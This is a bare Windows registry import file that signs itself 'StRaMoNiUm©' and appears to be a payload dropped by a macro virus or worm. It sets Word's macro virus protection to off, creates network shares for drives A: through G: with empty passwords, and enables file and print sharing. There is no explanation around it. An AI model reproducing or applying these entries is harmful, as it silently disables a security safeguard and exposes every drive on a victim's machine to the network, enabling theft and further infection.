REGEDIT4                   

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion]                    
"RegisteredOwner"="StRaMoNiUm©"                    
"RegisteredOrganization"="MYSELF ! ! ! "                    
[HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Options]                    
"EnableMacroVirusProtection"="0"                    


[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network]                    
"Installed"="1"                    

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Real Mode Net]                    
"transport"=""                    
"netcard"=""                    
"LoadRMDrivers"=hex:00,00,00,00                    
"preferredredir"=""                    

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman]                    

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\A]                    
"Path"="A:\\"                    
"Remark"=""                    
"Type"=dword:00000000                    
"Flags"=dword:00000102                    
"Parm1enc"=hex:                    
"Parm2enc"=hex:                    

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\C]                    
"Path"="C:\\"                    
"Remark"=""                    
"Type"=dword:00000000                    
"Flags"=dword:00000102                    
"Parm1enc"=hex:                    
"Parm2enc"=hex:                    

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\D]                    
"Path"="D:\\"                    
"Remark"=""                    
"Type"=dword:00000000                    
"Flags"=dword:00000102                    
"Parm1enc"=hex:                    
"Parm2enc"=hex:                    

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\E]                    
"Path"="E:\\"                    
"Remark"=""                    
"Type"=dword:00000000                    
"Flags"=dword:00000102                    
"Parm1enc"=hex:                    
"Parm2enc"=hex:                    

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\F]                    
"Path"="F:\\"                    
"Remark"=""                    
"Type"=dword:00000000                    
"Flags"=dword:00000102                    
"Parm1enc"=hex:                    
"Parm2enc"=hex:                    

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\G]                    
"Path"="G:\\"                    
"Remark"=""                    
"Type"=dword:00000000                    
"Flags"=dword:00000102                    
"Parm1enc"=hex:                    
"Parm2enc"=hex:                    

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Network]                    
"NoFileSharing"=dword:00000000                    
"NoPrintSharing"=dword:00000000                    
